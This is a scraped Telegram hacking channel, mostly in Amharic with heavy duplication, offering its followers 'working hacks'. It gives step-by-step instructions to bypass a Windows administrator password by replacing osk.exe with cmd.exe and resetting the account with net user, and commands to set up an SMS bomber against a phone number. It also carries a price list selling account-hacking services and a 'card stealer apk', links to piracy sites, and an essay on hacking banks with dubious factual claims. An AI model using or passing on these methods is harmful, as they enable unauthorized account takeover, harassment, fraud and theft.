🔐የAndroid ሚስጢራዊ ኮዶች🔐🗝
1⃣. Phone information code: *#*#4636#*#*
2⃣. Factor data reset code: *#*#7780#*#*
3⃣. Format android phone code:*2767*3855#
4⃣. Phone camera update code:*#*#34971539#*#*
-Update camera firmware in image
-Update camera firmware in SD card
-Camera firmware version
-Firmware update count
5⃣. End call power
code:*#*#7594#*#*
6⃣. File copy for creating backup code:*#*#273283*255*663282*#*#
7⃣.Service mode code:*#*#197328640#*#*
•*#*#232338#*#* show Wi-Fi Mac address
•*#*#1472365#*#* GPS test
•*#*#1575#*#* another GPS test
•*#*#232337#*#* show Bluetooth device
•*#*#232331#*#* bluetooth test
√ Firmware version information code:
*#*#4986*2650468#*#*
•*#*#1234*#*# PDA and phone
•*#*#1111#*#* FTA SW version
•*#*#2222#*#* FTA HW version
√ Code to launch various factory test
•*#*#0283#*#* packet loop back
•*#*#*0*#*#* LED test
•*#*#0673#*#* or *#*#0283#*#* melody test
•*#*#0842#*#* Device test (vibration and backlight test)
•*#*#2663#*#* Touch screen version
•*#*#2664#*#* Touch screen test
•*#*#0588#*#* Proximity sensor test
•*#*#3264#*#* RAM
information
so these are some working android hack.
1⃣. Phone information code: *#*#4636#*#*
2⃣. Factor data reset code: *#*#7780#*#*
3⃣. Format android phone code:*2767*3855#
4⃣. Phone camera update code:*#*#34971539#*#*
-Update camera firmware in image
-Update camera firmware in SD card
-Camera firmware version
-Firmware update count
5⃣. End call power
code:*#*#7594#*#*
6⃣. File copy for creating backup code:*#*#273283*255*663282*#*#
7⃣.Service mode code:*#*#197328640#*#*
•*#*#232338#*#* show Wi-Fi Mac address
•*#*#1472365#*#* GPS test
•*#*#1575#*#* another GPS test
•*#*#232337#*#* show Bluetooth device
•*#*#232331#*#* bluetooth test
√ Firmware version information code:
*#*#4986*2650468#*#*
•*#*#1234*#*# PDA and phone
•*#*#1111#*#* FTA SW version
•*#*#2222#*#* FTA HW version
√ Code to launch various factory test
•*#*#0283#*#* packet loop back
•*#*#*0*#*#* LED test
•*#*#0673#*#* or *#*#0283#*#* melody test
•*#*#0842#*#* Device test (vibration and backlight test)
•*#*#2663#*#* Touch screen version
•*#*#2664#*#* Touch screen test
•*#*#0588#*#* Proximity sensor test
•*#*#3264#*#* RAM
information
so these are some working android hack.
Forwarded from Ģuyyes Fans🤩
🔐እንዴት የ ማንኛዉንም windows computer administrator password ማለፍ እንችላለን?
▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃
Requirements:
—> ማንኛዉም የwindows operating system የተጫነበት cd ወይም usb
Eg. Windows7 os or windows 8 os
Let’s begin………..
—> computrሩን ከ cd ወይም ከusb ማስነሳት(boot from cd or usb)
—> ልክ boot አርጎ ከተነሳ በኋላ shift+F10 መጫን ከዛ command promote ይከፈታል
ምናልባት command promote ካልከፈተ shift+fn+F10 ሞክሩት
—> Type “cd c:” without quotation then hit enter
—>Type “dir” hit enter
--> Windows የሚለው ዝርዝር እስከሚመጣ ድረስ ፊደሉን እየቀያየሩ መሞከር
Eg. “D:” hit enter then “dir” hit enter then check “windows”
“E:” hit enter then “dir” hit enter then check “windows”
—> ከዛ በ ስእሉ ላይ የሚታየዉን በትክክል ይጻፉ
—> “cd windows/system32” hit enter
--> Type “rename osk.exe osk.old” hit enter
—> Type “rename cmd.exe osk.exe” hit enter
--> አሁን 75% ሚሆነዉን ስራ ጨርሰናል ከዚ ቀጥሎ computerun restart ማድረግ
—> ከስር በግራ በኩል የሚታየዉን icon መጫን
—>On-Screen Keyboard የሚለዉን መምረጥ
-->command promote display ሲሆን ስእሉ ላይ ያለዉን command ማስገባት
—> Type ”net user” hit enter
—> Type ”net user help *” hit enter —---- help ማለት የ computeru ስም ነው
-->ከዛ ምትፈልጉትን password ማስገባት
—> Password እንድይኖረው ከፈለጋቹ ደሞ hit enter ሁለቴ
--> አሁን Passwordu ተከይሯል ማለት ነው
—> የከየራቺሁትን Password አስግብታቹ login ማረግ
✍ ለጓደኛዎ #share ማድረጎን አይርሱ።
✅ @Ethio_hacke
▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃
Requirements:
—> ማንኛዉም የwindows operating system የተጫነበት cd ወይም usb
Eg. Windows7 os or windows 8 os
Let’s begin………..
—> computrሩን ከ cd ወይም ከusb ማስነሳት(boot from cd or usb)
—> ልክ boot አርጎ ከተነሳ በኋላ shift+F10 መጫን ከዛ command promote ይከፈታል
ምናልባት command promote ካልከፈተ shift+fn+F10 ሞክሩት
—> Type “cd c:” without quotation then hit enter
—>Type “dir” hit enter
--> Windows የሚለው ዝርዝር እስከሚመጣ ድረስ ፊደሉን እየቀያየሩ መሞከር
Eg. “D:” hit enter then “dir” hit enter then check “windows”
“E:” hit enter then “dir” hit enter then check “windows”
—> ከዛ በ ስእሉ ላይ የሚታየዉን በትክክል ይጻፉ
—> “cd windows/system32” hit enter
--> Type “rename osk.exe osk.old” hit enter
—> Type “rename cmd.exe osk.exe” hit enter
--> አሁን 75% ሚሆነዉን ስራ ጨርሰናል ከዚ ቀጥሎ computerun restart ማድረግ
—> ከስር በግራ በኩል የሚታየዉን icon መጫን
—>On-Screen Keyboard የሚለዉን መምረጥ
-->command promote display ሲሆን ስእሉ ላይ ያለዉን command ማስገባት
—> Type ”net user” hit enter
—> Type ”net user help *” hit enter —---- help ማለት የ computeru ስም ነው
-->ከዛ ምትፈልጉትን password ማስገባት
—> Password እንድይኖረው ከፈለጋቹ ደሞ hit enter ሁለቴ
--> አሁን Passwordu ተከይሯል ማለት ነው
—> የከየራቺሁትን Password አስግብታቹ login ማረግ
✍ ለጓደኛዎ #share ማድረጎን አይርሱ።
✅ @Ethio_hacke
What is Kali Linux ?
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.
More than 600 penetration testing tools included: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality. Details on what’s included are on the Kali Tools site.
Free (as in beer) and always will be: Kali Linux, like BackTrack, is completely free of charge and always will be. You will never, ever have to pay for Kali Linux.
Open source Git tree: We are committed to the open source development model and our development tree is available for all to see. All of the source code which goes into Kali Linux is available for anyone who wants to tweak or rebuild packages to suit their specific needs.
FHS compliant: Kali adheres to the Filesystem Hierarchy Standard, allowing Linux users to easily locate binaries, support files, libraries, etc.
Wide-ranging wireless device support: A regular sticking point with Linux distributions has been supported for wireless interfaces. We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
Custom kernel, patched for injection: As penetration testers, the development team often needs to do wireless assessments, so our kernel has the latest injection patches included.
Developed in a secure environment: The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols.
GPG signed packages and repositories: Every package in Kali Linux is signed by each individual developer who built and committed it, and the repositories subsequently sign the packages as well.
Multi-language support: Although penetration tools tend to be written in English, we have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
Completely customizable: We thoroughly understand that not everyone will agree with our design decisions, so we have made it as easy as possible for our more adventurous users to customize Kali Linux to their liking, all the way down to the kernel.
ARMEL and ARMHF support: Since ARM-based single-board systems like the Raspberry Pi and BeagleBone Black, among others, are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, with fully working installations for both ARMEL and ARMHF systems. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution so tools for ARM are updated in conjunction with the rest of the distribution.
Kali Linux is specifically tailored to the needs of penetration testing professionals, and therefore all documentation on this site assumes prior knowledge of, and familiarity with, the Linux operating system in general. Please see Should I Use Kali Linux? for more details on what makes Kali
@Ethio_hacke
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.
More than 600 penetration testing tools included: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality. Details on what’s included are on the Kali Tools site.
Free (as in beer) and always will be: Kali Linux, like BackTrack, is completely free of charge and always will be. You will never, ever have to pay for Kali Linux.
Open source Git tree: We are committed to the open source development model and our development tree is available for all to see. All of the source code which goes into Kali Linux is available for anyone who wants to tweak or rebuild packages to suit their specific needs.
FHS compliant: Kali adheres to the Filesystem Hierarchy Standard, allowing Linux users to easily locate binaries, support files, libraries, etc.
Wide-ranging wireless device support: A regular sticking point with Linux distributions has been supported for wireless interfaces. We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
Custom kernel, patched for injection: As penetration testers, the development team often needs to do wireless assessments, so our kernel has the latest injection patches included.
Developed in a secure environment: The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols.
GPG signed packages and repositories: Every package in Kali Linux is signed by each individual developer who built and committed it, and the repositories subsequently sign the packages as well.
Multi-language support: Although penetration tools tend to be written in English, we have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
Completely customizable: We thoroughly understand that not everyone will agree with our design decisions, so we have made it as easy as possible for our more adventurous users to customize Kali Linux to their liking, all the way down to the kernel.
ARMEL and ARMHF support: Since ARM-based single-board systems like the Raspberry Pi and BeagleBone Black, among others, are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, with fully working installations for both ARMEL and ARMHF systems. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution so tools for ARM are updated in conjunction with the rest of the distribution.
Kali Linux is specifically tailored to the needs of penetration testing professionals, and therefore all documentation on this site assumes prior knowledge of, and familiarity with, the Linux operating system in general. Please see Should I Use Kali Linux? for more details on what makes Kali
@Ethio_hacke
ምን መግዛት ይፈልጋሉ ???
1.wifi hacker app
2.kali linux os
3.hack telegram account
4.hack by sending link
5.insta,telegram,fb,WhatsApp hack
6.card stealer apk not mb
7.kali linux 2020 highly compressed only 54 mb
8.termux
የዋጋ ዝርዝር
1. 1⃣5⃣ ብር
2. 5⃣0⃣ ብር
3. 2⃣5⃣ ብር
4. 2⃣5⃣ ብር
5. 2⃣5⃣ ብር
6. 1⃣5⃣ ብር
7. 5⃣0⃣ ብር
8. 1⃣0⃣ ብር
ሁሉም 💯💯💯💯
@Noelblx
ያናግሩኝ
1.wifi hacker app
2.kali linux os
3.hack telegram account
4.hack by sending link
5.insta,telegram,fb,WhatsApp hack
6.card stealer apk not mb
7.kali linux 2020 highly compressed only 54 mb
8.termux
የዋጋ ዝርዝር
1. 1⃣5⃣ ብር
2. 5⃣0⃣ ብር
3. 2⃣5⃣ ብር
4. 2⃣5⃣ ብር
5. 2⃣5⃣ ብር
6. 1⃣5⃣ ብር
7. 5⃣0⃣ ብር
8. 1⃣0⃣ ብር
ሁሉም 💯💯💯💯
@Noelblx
ያናግሩኝ
Forwarded from Ģuyyes Fans🤩
This media is not supported in your browser
VIEW IN TELEGRAM
♨️♨️ ሰላም ሰላም ♨️♨️
💠Best websites for games and softwares
📌 PC GAMES
🔰http://oceanofgames.com/
🔰http://www.ovagames.com/
🔰http://fitgirl-repacks.site/
🔰http://skidrowgamez.net/
🔰http://full-pcgames.com/
🔰http://www.xfullgames.com/
🔰http://www.newgamesbox.com/
🔰http://www.y8.com/
📌 SOFTWARES
🔰http://getintopc.com/
🔰https://fullstuff.co/
🔰http://www.piratecity.net/
🔰http://gigahax.com/en/
🔰http://karanpc.com/
🔰http://www.mixhax.com/
🔰http://www.novahax.com/
🔰http://full-pcsoftware.com/
🔰http://dl.par30dl.com/Software/
🔰http://s0ft4pc.com/
🔰http://filehippo.com/
🔰http://www.fileeagle.com/
🔰http://softfunda.com/
🔰https://www.freewaresys.com/
Phone📱
1. rexdl.com (mods, apk, obb)
2. apkpure.com (original, full apk)
3. apkreal.com (mods, apk, obb)
4. oceanofapk.com
➖➖➖➖➖➖Websites➖➖➖➖➖➖
🆔 @Ethio_hacke
💠Best websites for games and softwares
📌 PC GAMES
🔰http://oceanofgames.com/
🔰http://www.ovagames.com/
🔰http://fitgirl-repacks.site/
🔰http://skidrowgamez.net/
🔰http://full-pcgames.com/
🔰http://www.xfullgames.com/
🔰http://www.newgamesbox.com/
🔰http://www.y8.com/
📌 SOFTWARES
🔰http://getintopc.com/
🔰https://fullstuff.co/
🔰http://www.piratecity.net/
🔰http://gigahax.com/en/
🔰http://karanpc.com/
🔰http://www.mixhax.com/
🔰http://www.novahax.com/
🔰http://full-pcsoftware.com/
🔰http://dl.par30dl.com/Software/
🔰http://s0ft4pc.com/
🔰http://filehippo.com/
🔰http://www.fileeagle.com/
🔰http://softfunda.com/
🔰https://www.freewaresys.com/
Phone📱
1. rexdl.com (mods, apk, obb)
2. apkpure.com (original, full apk)
3. apkreal.com (mods, apk, obb)
4. oceanofapk.com
➖➖➖➖➖➖Websites➖➖➖➖➖➖
🆔 @Ethio_hacke
#SMS
SMS Bomber to Termux
Open Tremux
$ apt install git
$ git clone https://github.com/Noxturnix/Spammer-Grab
$ cd Spammer-Grab
$ ./auto-install.sh
$ python2 spammer.py -h
$ python2 spammer.py --delay 2 9190XXXXXX80 (Enter Phone Number)
[#] SMS Send On & SMS Send Off - CTRL+C
SMS Bomber to Termux
Open Tremux
$ apt install git
$ git clone https://github.com/Noxturnix/Spammer-Grab
$ cd Spammer-Grab
$ ./auto-install.sh
$ python2 spammer.py -h
$ python2 spammer.py --delay 2 9190XXXXXX80 (Enter Phone Number)
[#] SMS Send On & SMS Send Off - CTRL+C
Forwarded from Deleted Account
ኢትዮ ቴሌኮም...
በዘንድሮ አመት ትርፍማ ስለሆነ ለየት ያለ ቦነስ ከጥር 8 እስከ 17 ቀን 2012 ዐ.ም ድረስ ውጭ ሀገር የሚገኝ ወዳጅ ዘመድዎ የአየር ሰአት ሲሞላልዎ 50% ተጨማሪ የአየር ሰአት ስጦታ ያገኛሉ።እና ደሞ
*805*ከዛ የካርድ ቁጥሮን በማስገባት* በማድረግ ከታች ያለውን ኮድ 993557338 በማስገባት # በመጫን ከተጨማራ ቦነስ ጋር ይደርሶታል
ባለ 15 ወደ 23
ባለ 25 ወደ 36.50
ባለ 50 ወደ 75.50
ባለ 100 ወደ 147
መቀየር ሲችሉ በደስታ ነው ኮድ እስከ ጥር 30 ቡቻ ከቴሌግራም ቻናላችን በተጨማሪ የኢንስታግራም ገጻችንን https://www.instagram.com/ethiotelecom/ ይከተሉ
በዘንድሮ አመት ትርፍማ ስለሆነ ለየት ያለ ቦነስ ከጥር 8 እስከ 17 ቀን 2012 ዐ.ም ድረስ ውጭ ሀገር የሚገኝ ወዳጅ ዘመድዎ የአየር ሰአት ሲሞላልዎ 50% ተጨማሪ የአየር ሰአት ስጦታ ያገኛሉ።እና ደሞ
*805*ከዛ የካርድ ቁጥሮን በማስገባት* በማድረግ ከታች ያለውን ኮድ 993557338 በማስገባት # በመጫን ከተጨማራ ቦነስ ጋር ይደርሶታል
ባለ 15 ወደ 23
ባለ 25 ወደ 36.50
ባለ 50 ወደ 75.50
ባለ 100 ወደ 147
መቀየር ሲችሉ በደስታ ነው ኮድ እስከ ጥር 30 ቡቻ ከቴሌግራም ቻናላችን በተጨማሪ የኢንስታግራም ገጻችንን https://www.instagram.com/ethiotelecom/ ይከተሉ
@Ethio_hacke
@Ethio_hacke
☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☢️THIS TOOLS IS VERY POWERFUL TOOLS YOU CAN USE FOR INFORMATION GATHERING....
📱Attacker machine:- TERMUX
INSTALLATION COMMANDS
1️⃣cpan install LWP::UserAgent
2️⃣cpan install HTTP::Request
3️⃣git clone https://github.com/Moham3dRiahi/Th3inspector.git cd Th3inspector chmod +x install.sh
4️⃣./install.sh
How to use:-
To list all the basic options and switches use -h switch:
perl Th3inspector.pl -h
To Get Website Information:
perl Th3inspector.pl -i example.com
To Get Phone Number Information :
perl Th3inspector.pl -n xxxxxxx
To Find IP Address And E-mail Server:
perl Th3inspector.pl -mx example.com
To Find Website Or IP Address Location :
perl Th3inspector.pl -l example.com
To Get Real IP Of Website Using CloudFlare Protection
perl Th3inspector.pl -c example.com
@Ethio_hacke
☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☢️THIS TOOLS IS VERY POWERFUL TOOLS YOU CAN USE FOR INFORMATION GATHERING....
📱Attacker machine:- TERMUX
INSTALLATION COMMANDS
1️⃣cpan install LWP::UserAgent
2️⃣cpan install HTTP::Request
3️⃣git clone https://github.com/Moham3dRiahi/Th3inspector.git cd Th3inspector chmod +x install.sh
4️⃣./install.sh
How to use:-
To list all the basic options and switches use -h switch:
perl Th3inspector.pl -h
To Get Website Information:
perl Th3inspector.pl -i example.com
To Get Phone Number Information :
perl Th3inspector.pl -n xxxxxxx
To Find IP Address And E-mail Server:
perl Th3inspector.pl -mx example.com
To Find Website Or IP Address Location :
perl Th3inspector.pl -l example.com
To Get Real IP Of Website Using CloudFlare Protection
perl Th3inspector.pl -c example.com
GitHub
GitHub - Moham3dRiahi/Th3inspector: Th3Inspector 🕵️ Best Tool For Information Gathering 🔎
Th3Inspector 🕵️ Best Tool For Information Gathering 🔎 - Moham3dRiahi/Th3inspector
ባንክና ሌሎች ተቋማት እንዴት ሃክ/hack/ ይደረጋሉ።
*
ሰላም ጤና ይስጥልን ውድ የገጻችን ተከታታዮች እንዴት ናችሁ። በዚሕ ተከታታይ ክፍል ሰፋ
አድርገን ስለ ሳይበሩ ዓለም/መረጃ ብርበራና ዘረፋ/ በሰፊው እንመለከታለን።
በአሁኑ ወቅት ዓለም በዲጂታል ሲስተም ወደ አንድ ቤተሰብ ብትመጣም የመረጃ ስርቆት/ሳይበር
ወንጀል/ ግን ራስ ምታት ከሆነባት ብዙ ዓመታትን ተቆጠረዋል። ከትንሽ እስከ ትልቅ፡ ከግል
እስከ መንግስት ተቋማትና ከክልል እስከ ሀገር ብሎም አሕጉር ድረስ ኢንተርኔት እስከተዘረጋበት
ቢሮ ሳይበር ዓለምን እየረበሸ ይገኛል። በቅርቡ ባሳለፍነው ሐምሌ ወር መጨረሻ እንኳ ሩሲያ
በታሪኳ አይታው የማታውቅ የሳይበር ጥቃት ደርሶ ወደ 8GB የሚሆን የወታደራዊና የሀገራዊ
ደሕንነት መረጃዎች ዘረፋ ጥቃት ደርሶባታል። ባለፉት ሁለት ዓመት ውስጥ እንኳ 'ዋና
ክራይ' ...ትርጓሜው አለቅሳለሁ እንደማለት ነው.....የተባለው በሀከሮች የተሰራው
የኮምፒውተር ባይረስ አለምን ኢትዮጵያን ጨምሮ 150 ሀገሮችንእንዴት እንደመታ የቅርብ ጊዜ
ትውስታ ነው። ይሕ ባይረስ ብር ከተሰጠከው ብቻ ነው ከኮምፒውተር ሲስተም የሚወጣው።
ባይረሱ የ200,000 ሰዎችን ቤት ሲያንኳኳ የ300,000 ኮምፒውተሮችን ደግሞ
አጥቅቷል።ሲወጣም እጅግ በረቀቀ መልኩ ራሱን በመግደል/Self Killing/ ስለነበር፡
ስለማንነቱ/ፎረንሲክ ምርመራ/ ዓለም እስካሁን አልደረሰበትም። ሰሜን ኮርያ ግን በጉዳዩ
ተጠርጥራ ነበር።ያደረሰው ኪሳራም በኮምፒውተር እስከ 600$ የሚጠይቅና የታይዋንን
የኤሌክትሮኒክ ፋብሪካ ሙሉ በሙሉ እንዲዘጋ በማድረግ ባጠቃላይ 4ቢሊዮን የአሜሪካ ዶላር
ጥፋት አድርሷል፡ መዝብሯል።
በዚሕ ጽሑፍ ውስጥ ስለተቋማት የመረጃ ሰበራ ሂደት በቅደም ተከተል ይቀርባል። ከዚያ በፊት
ግን እኛ መረጃ ሰባሪዎች አይደለንም ለጠቅላላ እውቀትና ለትምህርት ያክል ነው የምንጽፈው
ለማለት እንወዳለን። ሰላም።
*
የባንክና የንግድ ተቋማት እንዲሁም የማኅበራዊ ወታደራዊ ተቋማት ወዘተ የሚበረበሩት በተለያየ
ምክንያት ነው።
*አንደኛውና ዋነኛው የመረጃ አያያዝን አለማጠንከርና አለማዘመን ናቸው። እነዚሕ ነገሮች
በመረጃ አያያዝ እጅግ ወሳኝ ናቸው። ለምሳሌ ከይለፍቃል/PassWord/ ጀምሮ አለማጠንከር
እነደምሳሌ ይነሳል። alemu1234, 0934....43, abcd1234, love143, password1,
...ወዘተ የሚሉ የይለፍ ቃሎች በሀከሮች ለመገኘት የደቂቃ ጊዜ አይወስድባቸውም። ፓስወርድ
ሰበራን በተለያየ መልኩ የሚሰራ ሲሆን ከነዚሕ ውስጥ የሚታወቀው፡ ብሩት ፎርስ አታክ ወይም
ዲክሽነሪ አታክ የሚባለው ነው። ይሕም የተለያዩ ዓለም ላይ አሉ የተባሉ ስሞችን እያስገባ
ይፈልጋል። የይለፍ ቃሉ ከጠነከረ ለምሳሌ $@78S#Fm&%=, ዓይነት ፓስወርዶች ሊሰበሩ
አይችሉም/99.5% ጠንካራ ናቸው/። በስፋት ደግሞ በሌላ ጊዜ እንመጣበታለን።
*የኔትዎርክ ደሕንነት፡ የኔትዎርክ እውቀት በሀከሮች ዘንድ መሰረታዊ ነው። የኔትዎርክ
አቀማመጥ ፡ዝርግታ ፡ደሕንነት ...ወዘተ ይቃኛሉ። ዘዴው የኔትዎርክ ኮማንድ እውቀት/TCP/IP/
UDP..... Network protocol, Network topography, Mac address & Port scan,
Ip Address searching...ወዘተ የሚባሉ መሠረታዊ ነገሮች ለመረጃ ሰባሪዎች ወሳኝ
ናቸውና ስለኔትወርቅ ጠንቅቀው ያውቃሉ። ምክንያቱም እነርሱም በኔትወርክ እንጂ በአካል
ተገኝተው መረጃና ሌሎችን ነገሮች አያደርጉምና። ለምሳሌ ስለ አንድ ድርጅት ለማወቅ ለማወቅ
መረጃን online ይሰበሰባ። አንድ ሰው ስለ google ለማወቅ አድራሻ ቢፈልግና ሰርበሩን
ባያውቀው በኔትወርክ ping www.google.com ብሎ cmd ላይ ፒንግ በማድረግ ስለ ip
address, ttl. Time bytes በቀላሉ ማወቅ ይችላለ። ቀጣዩን ደግሞ እንዲሕ እያደረገ
ይጓዛለሁ። ሀከሮችም እንደዛው ነው። በነገራችን ላይ google ላይ ከአራት በላይ ፒንግ
ካደረጋችሁ ስለላ መስሎት ሊዘገጋባችሁ ይችላል። ማሳሰቢያ ናት / ስለዚሕ ደህንነታቸው
ባልተጠበቀ ኔትዎርኮች ላይ ሀከሮች ይረማመዱባቸዋል።
*የፕሮግራሚንግ ችሎታ : በፕሮግራሚንግ እውቀት አብዛው ብላክ ሃከሮችና የሶፍትዌር
መገንባት ችሎታ ያላቸው ፕሮግራመሮች የሚጠቀሙበት ሲሆን እነዚሕም አንቲ ባይረሶችን
ለማለፍ, ባይረስ ለመስራት, ኪሎገር ለመስራት, መረጃን ለመሠብሰብ, የይለፍ ቃል መሠለል,
አጠቃላይ የሲስተሙን ደካማ ጎን ለማግኘት ይጠቀሙበታል።
*ሌላው የሶሻል ኢንጅነሪንግ ዘርፍ ነው። ሶሻል ኢንጂነሪንግ/ማኅበራዊ ምሕንድስና/ የሚባለው
ቀላል ቴክኒኮችን/ምርመራ/ በመጠቀም ለመረጃ ሰበራ መዘጋጀት ነው። ከነዚህም አንዱና
ታዋቂው ፊሺንግ አታክ/አታሎ ማጥቃት/ የሚባለው ነው። ለምሳሌ ዳታ ልላክልሕ ኤሜልህን
ስጠኝ ያለ ሰው፡ ኤሜል ከሰጠኸው በኋላ ፓስወርዱን ለማግኘት ሌሎች ዘዴዎችን በመጠቀም
ያገኘዋል። በዩኒበርስቲው የግሬድ ውጤት ማሳወቂያ ቢሮ ሄደው "ፓስወርዱን ረሳኩት
ይስተካከልልኝ" ብሎ ሄዶ admin pageን ከነ Ip address ጋር በማየት ውጤታቸውን ከD
ወደ A+ የሚቀይሩ ብልጥ ተማሪዎች አይጠፋም።ip ና admin pageን ካገኙት username
ና password በሌላ ዘዴ ያገኙታል ማለት ነው።
*ባይረስ፡ ባይረስ ሌላኛው የኮምፒውተር መጥለፊያ ዘዴ ነው።ይሕም የሚሆነው ከፍተኛ
የፕሮግራም ኮድ የመጻፍ ችሎታ ባላቸው ሀከሮች ነው። የኮምፕዩተር ዳታ አቀማመጥና
አቀናባበር/automata & architecture/ የማወቅ ግዴታን ይጠይቃል። የባይረስ አባት
የሚባለው የሃንጋሪ ሰው ጆን ኒማን በ1949 ራሱን ችሎ ኮምፕዩተር ላይ በማራባት ወደ ሌሎች
ኮምፒዩተሮች መሰግሰግ የሚችል ፕሮግራም ከፃፈ ወዲሕ ሀከሮች በተለያየ መልኩ ባይረስ
ይጠቀማሉ። ባይረሶች/ፕሮግራሞች/ የተለያየ ተልዕኮ ይዘው ወደ ኮምፒውተር ይላካሉ።
መሠለል፡ መረጃ መዝረፍ፡ መረጃ መደበቅና ማጥፋት፡ ኮምፕዩተርና የተለያዩ በኮምፒውተር
ስርዓት የሚሰሩ ማሽኖችን ከጥቅም ውጭ ማድረግ፡ ሊሆን ይችላል።
በይዘታቸው ዋርም/ራንሶርም፡ ትሮጃን፡ ማሊሸስ ወዘተ አየተባሉ ይሄዳሉ በሌላ ጌዜ ራሱን ችሎ
ካላየነው በጣም ሰፊ ነው።
*የኮምፒውተር ቀጥታ ጥቃት: እጅግ ብዙ ዓይነት የኮምፒውተር ቀጥታ ጥቃቶች ሲኖሩ ታዋቂው
ግን ዲዶስ አታክ/Denial of service attack/ ይባላል። ለምሳሌ እኔ እዚሕ ቁጭ ብየ እናንተ
online/ኢንተርኔት እየተጠቀማችሁ/ እንደሆነ ካወቅሁ ወይም ዌብሳይት ካላችሁ ፡
ኮምፕዩተራችሁን ሆነ ዌብሳይት/ድኅረ ገጻችሁን/ ሪሞትሊ መዝጋት/shutdown/ ማድረግ
እችላለሁ። ነገሩ ከባድ አደለም ቀላል ነው። የናንተን አይ ፒ/IP Adress/ ፒንግ አድርጌ
ማወቅ ይጠበቅብኛል። ወይም ዌብሳታችሁን ለመዝጋት አገናኝ አድራሻ/IP Adress/ ካወቅሁ
የቀረዉ ስራ ከባድ አደለም። ምክንያቱም ዳታ በማሳደግና በማሳነስ የመቀበል ፕሮቶኮሉ ከተዛባ
ዌብሳይታቹሕ አይሰራም። በዚሕ/Temporarily Unavailable/ ብሎ ይዘጋል ማለት
ነው።ዲዶስ DDos attack በጣም ቀላል ሲሆን ጥፋቱ እጅግ ከባድ ነው።
*
ስለ ሳይበሩ ዓለም እነዚሕና ሌሎች መንገዶችን በመጠቀም ተቋማትን ያጠቃሉ። ዛሬ ይሕን
ያክል ካልን ሀከሮች የተለያዩ ዘዴዎችን በመጠቀም ተቋማትን እንዴት እንደሚዘርፉና እንዳይያዙ
ከፎረንሲክ ምርመራ ነፃ ለመሆን ምን እንደሚጠቀሙ እንያለን። ሀከሮች የሚጠቀሙባቸው
አስራ ሶስት ያህል መንገዶች እናቀርባለን
ባንክና ሌሎች ተቋማት እንዴት ሃክ/hack/
*
ሰላም ጤና ይስጥልን ውድ የገጻችን ተከታታዮች እንዴት ናችሁ። በዚሕ ተከታታይ ክፍል ሰፋ
አድርገን ስለ ሳይበሩ ዓለም/መረጃ ብርበራና ዘረፋ/ በሰፊው እንመለከታለን።
በአሁኑ ወቅት ዓለም በዲጂታል ሲስተም ወደ አንድ ቤተሰብ ብትመጣም የመረጃ ስርቆት/ሳይበር
ወንጀል/ ግን ራስ ምታት ከሆነባት ብዙ ዓመታትን ተቆጠረዋል። ከትንሽ እስከ ትልቅ፡ ከግል
እስከ መንግስት ተቋማትና ከክልል እስከ ሀገር ብሎም አሕጉር ድረስ ኢንተርኔት እስከተዘረጋበት
ቢሮ ሳይበር ዓለምን እየረበሸ ይገኛል። በቅርቡ ባሳለፍነው ሐምሌ ወር መጨረሻ እንኳ ሩሲያ
በታሪኳ አይታው የማታውቅ የሳይበር ጥቃት ደርሶ ወደ 8GB የሚሆን የወታደራዊና የሀገራዊ
ደሕንነት መረጃዎች ዘረፋ ጥቃት ደርሶባታል። ባለፉት ሁለት ዓመት ውስጥ እንኳ 'ዋና
ክራይ' ...ትርጓሜው አለቅሳለሁ እንደማለት ነው.....የተባለው በሀከሮች የተሰራው
የኮምፒውተር ባይረስ አለምን ኢትዮጵያን ጨምሮ 150 ሀገሮችንእንዴት እንደመታ የቅርብ ጊዜ
ትውስታ ነው። ይሕ ባይረስ ብር ከተሰጠከው ብቻ ነው ከኮምፒውተር ሲስተም የሚወጣው።
ባይረሱ የ200,000 ሰዎችን ቤት ሲያንኳኳ የ300,000 ኮምፒውተሮችን ደግሞ
አጥቅቷል።ሲወጣም እጅግ በረቀቀ መልኩ ራሱን በመግደል/Self Killing/ ስለነበር፡
ስለማንነቱ/ፎረንሲክ ምርመራ/ ዓለም እስካሁን አልደረሰበትም። ሰሜን ኮርያ ግን በጉዳዩ
ተጠርጥራ ነበር።ያደረሰው ኪሳራም በኮምፒውተር እስከ 600$ የሚጠይቅና የታይዋንን
የኤሌክትሮኒክ ፋብሪካ ሙሉ በሙሉ እንዲዘጋ በማድረግ ባጠቃላይ 4ቢሊዮን የአሜሪካ ዶላር
ጥፋት አድርሷል፡ መዝብሯል።
